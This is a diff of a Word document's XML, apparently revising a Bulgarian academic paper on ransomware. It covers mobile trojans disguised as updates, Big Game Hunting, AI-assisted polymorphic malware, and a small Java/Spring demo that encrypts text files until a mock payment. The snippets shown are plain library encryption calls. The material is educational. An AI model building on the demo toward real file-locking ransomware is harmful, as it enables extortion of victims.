+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> че файловете, които се криптират се запазват на нова локация, а </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>некриптираните</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> се изтриват. </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5176,7 +5220,34 @@
         <w:t>malware</w:t>
       </w:r>
       <w:r>
-        <w:t>, който атакува мобилни системи. Потребителят обикновено инсталира приложения от пиратски сайтове, но се промъква и троянския кон</w:t>
+        <w:t xml:space="preserve">, който атакува мобилни системи. Потребителят инсталира </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">мобилно </w:t>
+      </w:r>
+      <w:r>
+        <w:t>приложени</w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> от пиратски сайтове, но</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">към </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">него </w:t>
+      </w:r>
+      <w:r>
+        <w:t>се промъква и троянския кон</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5199,7 +5270,43 @@
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Опитва да достъпи административни правомощия маскирайки се като софтуерен ъпдейт на телефона, виж фигура 7.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Троянският кон се опитва </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">да </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">получи </w:t>
+      </w:r>
+      <w:r>
+        <w:t>административни правомощия</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> маскирайки се като софтуерен ъпдейт на телефона </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>фиг</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>6)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Ако потребителят се подведе и изпълни указанията, се сменя </w:t>
@@ -5211,7 +5318,52 @@
         <w:t>PIN</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> на телефона. Единственият начин да си възстанови достъпа е, ако телефона се върне до фабрични настройки. Това означава пълно изтриване на личните данни. Ако реши да плати откупа, пин кодът е неизвестен дори и на хакера, понеже е случайно генерирано число.</w:t>
+        <w:t xml:space="preserve"> кода</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на телефона.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Единственият начин да си възстанови достъпа е, ако </w:t>
+      </w:r>
+      <w:r>
+        <w:t>мобилното устройство</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> се </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">преинсталира обратно до </w:t>
+      </w:r>
+      <w:r>
+        <w:t>фабрични настройки. Това означава пълно изтриване на данни</w:t>
+      </w:r>
+      <w:r>
+        <w:t>те на устройството</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PIN</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> кодът е неизвестен дори и на хакера</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, тъй като е случайно генерирано число</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, следователно откупването е безполезно.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -5313,7 +5465,13 @@
         <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
-        <w:t>Троянски код маскиран като софтуерен ъпдейт.</w:t>
+        <w:t>Троянски ко</w:t>
+      </w:r>
+      <w:r>
+        <w:t>н,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> маскиран като софтуерен ъпдейт.</w:t>
       </w:r>
       <w:bookmarkEnd w:id="12"/>
     </w:p>
@@ -5479,19 +5637,34 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">За да оптимизират атаките си, </w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> операторите променят стратегията си</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за създаване на по-силни атаки</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Те се отказват от метода „</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>ransomware</w:t>
+        <w:t>spray</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> операторите променят стратегията си. Те се отказват от метода „</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>spray</w:t>
+        <w:t>and</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5499,99 +5672,32 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>and</w:t>
+        <w:t>pray</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:t>“, при който зловредният софтуер се разпространява масово без конкретен избор на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> потърпевш</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Вместо това започват да таргетират конкретни организации и потребители, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>което е</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> известно още като</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Big Game Hunting.</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pray</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>“, при който зловредният софтуер се разпространява масово, без конкретен избор на жертва. Вместо това започват да таргетират конкретни организации и потребители</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, или известно още като</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Big Game Hunting.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Идеята е проста, вместо да се надяват някой да се хване и да получат малко сума откуп – стандартно са искали по 300</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> USD</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, компанията изложи на подобна атака стават жертва на откупи в суми достигащи десетки хиляди.  </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Такива жертви са </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>River Beach</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>TravelEx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, заплатили съответно 600 000</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> USD</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2.3 </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">млн. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>USD</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. В двата примера атаката е една и също, изтегляне на неверифицирани файлове през</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> phishing</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> имейл.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5600,6 +5706,167 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
+        <w:t xml:space="preserve">При </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>spray</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pray</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> метода киберпрестъпниците </w:t>
+      </w:r>
+      <w:r>
+        <w:t>получат малк</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> сума откуп – стандартно по 300</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">долара, защото таргетират случайни хора. От друга страна, при </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Big </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Game</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Hunting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>откупи</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">те достигат </w:t>
+      </w:r>
+      <w:r>
+        <w:t>десетки хиляди</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> долари, защото на риск са изложени подбрани компании и обекти. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Такива жертви са </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>River Beach</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TravelEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, заплатили съответно 600 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">хил. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>долара</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">млн. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>долара</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Атаката и в двата примера е една и съща -</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> изтегляне на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>неверифицирани</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> файлове през</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> phishing</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> имейл.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">На фигура 7 е показан модела на атаката в </w:t>
       </w:r>
       <w:r>
@@ -5609,13 +5876,17 @@
         <w:t xml:space="preserve">BGH. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се заразяват възможно най-много системи. После се </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деплойва</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се </w:t>
+      </w:r>
+      <w:r>
+        <w:t>заразят</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> възможно най-много системи. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Следва</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5623,15 +5894,31 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>ransomware-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ът</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и се изисква откуп в биткойни.</w:t>
+        <w:t xml:space="preserve">deploy </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">се изисква </w:t>
+      </w:r>
+      <w:r>
+        <w:t>откуп в биткойни.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5681,13 +5968,14 @@
       <w:r>
         <w:t xml:space="preserve">Използването на изкуствен интелект (ИИ) открива нов фронт в продължаващата борба срещу </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Както киберпрестъпниците, така и </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>R</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ansomware. Както </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5696,7 +5984,16 @@
         <w:t xml:space="preserve">security </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">експертите </w:t>
+        <w:t>експерти</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, така и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">киберпрестъпници </w:t>
       </w:r>
       <w:r>
         <w:t>използват тази технология, за да подобрят своята производителност</w:t>
@@ -5710,13 +6007,37 @@
         <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">През 2024 г. изкуственият интелект е бил използван за намаляване на </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">прага </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">за навлизане на хакери, създаване на по-персонализирани тактики, използване на уязвимости и изискване на по-високи откупи. </w:t>
+        <w:t xml:space="preserve">С навлизането на ИИ броят хакери се е увеличал значително. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> се използва за</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> създаване на </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">нови </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">по-персонализирани тактики, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>използва се за експлоатация на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> уязвимости и откупи</w:t>
+      </w:r>
+      <w:r>
+        <w:t>те са станали още по-големи като сума</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5740,7 +6061,13 @@
         <w:t xml:space="preserve"> последните две години</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> и е много вероятно изкуственият интелект да изостри тази тенденция през 202</w:t>
+        <w:t xml:space="preserve"> и е много вероятно изкуственият интелект да </w:t>
+      </w:r>
+      <w:r>
+        <w:t>продължи</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> тази тенденция през 202</w:t>
       </w:r>
       <w:r>
         <w:t>6</w:t>
@@ -5775,7 +6102,7 @@
         <w:t xml:space="preserve">a </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">автоматизация на стратегиите за изграждане на </w:t>
+        <w:t xml:space="preserve">автоматизация на стратегии за изграждане на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5830,7 +6157,13 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Ето някои от начините, за които хакерите използват </w:t>
+        <w:t xml:space="preserve">Ето някои от начините, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>по</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> които хакерите използват </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5850,13 +6183,8 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Полиморфен</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">Полиморфен </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5874,7 +6202,13 @@
         <w:t>ransomware</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> атаките разчита на методи, за детекция на често използвани модели. За да избегнат евентуална детекция към </w:t>
+        <w:t xml:space="preserve"> атаки разчита на методи за детекция на често използвани модели. За да избегнат евентуална детекция</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> към </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5892,7 +6226,22 @@
         <w:t>AI,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> която непрестанно модифицира кода си, за да го избегне. По този начин остава незабележим за антивирусните.</w:t>
+        <w:t xml:space="preserve"> ко</w:t>
+      </w:r>
+      <w:r>
+        <w:t>й</w:t>
+      </w:r>
+      <w:r>
+        <w:t>то непрестанно модифицира кода си, за да избегне</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> разпознаване от антивирусни</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> програми</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6096,7 +6445,7 @@
         <w:t>ransomware</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> е използвана </w:t>
+        <w:t xml:space="preserve"> е използван </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6114,7 +6463,13 @@
         <w:t>Spring Framework.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Целта на имплементацията е да се покаже колко лесно може да се създаде софтуер за криптиране и декриптиране на файлове, който да </w:t>
+        <w:t xml:space="preserve"> Целта на имплементацията е да се покаже колко лесно може да се създаде софтуер за </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">симетрично </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">криптиране и декриптиране на файлове, който да </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">бъде </w:t>
@@ -6144,56 +6499,57 @@
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Такъв тип атака е прилаган в ранните две хилядни.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> В демото има три текстови файла</w:t>
+        <w:t xml:space="preserve"> Такъв тип атака е прилаган </w:t>
+      </w:r>
+      <w:r>
+        <w:t>в</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> началото на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>XXI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> век</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>В демото има три текстови файла</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> При стартиран</w:t>
       </w:r>
       <w:r>
         <w:t>е</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> на приложението</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> се криптират</w:t>
+        <w:t xml:space="preserve"> на приложението се криптират</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> и</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> когато потребителят „плати“, тогава се декриптират обратно в текстови.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Използвани са следните </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dependencies:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6448,9 +6804,35 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pom.xml</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Използвани </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dependencies</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>pom.xml</w:t>
       </w:r>
       <w:bookmarkEnd w:id="17"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6571,7 +6953,15 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">String decrypt(String </w:t>
+        <w:t xml:space="preserve">String </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>decrypt(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">String </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -6629,6 +7019,9 @@
         <w:t>TextEncryptor</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6672,6 +7065,7 @@
         <w:t xml:space="preserve">    return new </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>HexEncodingTextEncryptor</w:t>
       </w:r>
@@ -6687,7 +7081,11 @@
         <w:t>standard</w:t>
       </w:r>
       <w:r>
-        <w:t>(password, salt));</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>password, salt));</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -6724,7 +7122,16 @@
         <w:fldChar w:fldCharType="end"/>
       </w:r>
       <w:r>
-        <w:t>: Метод от класа, която се използва в демото</w:t>
+        <w:t>: Метод от класа, ко</w:t>
+      </w:r>
+      <w:r>
+        <w:t>й</w:t>
+      </w:r>
+      <w:r>
+        <w:t>то се използва в демото</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6744,7 +7151,25 @@
         <w:t>password-based</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> криптиране, като се генерира ключ от паролата и солта. Паролата не трябва да бъде споделяне с никога, но в нашето демо е показана за демонстративни цели. Солта е произволна стойност за защита срещу </w:t>
+        <w:t xml:space="preserve"> криптиране, като се генерира ключ от паролата и солта. Паролата не трябва да бъде споделян</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> с нико</w:t>
+      </w:r>
+      <w:r>
+        <w:t>го</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, но в демо</w:t>
+      </w:r>
+      <w:r>
+        <w:t>то</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е показана за демонстративни цели. Солта е произволна стойност за защита срещу </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6753,7 +7178,19 @@
         <w:t xml:space="preserve">rainbow table </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">атаки. Криптира текста и го връща като </w:t>
+        <w:t xml:space="preserve">атаки. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Накрая се к</w:t>
+      </w:r>
+      <w:r>
+        <w:t>риптира текста и</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> се</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> връща като </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6836,10 +7273,35 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>който се използва да прочете и криптира/декриптира горепосочените три текстови файла.</w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">който се използва </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">за прочитане </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и криптира</w:t>
+      </w:r>
+      <w:r>
+        <w:t>не</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/декриптира</w:t>
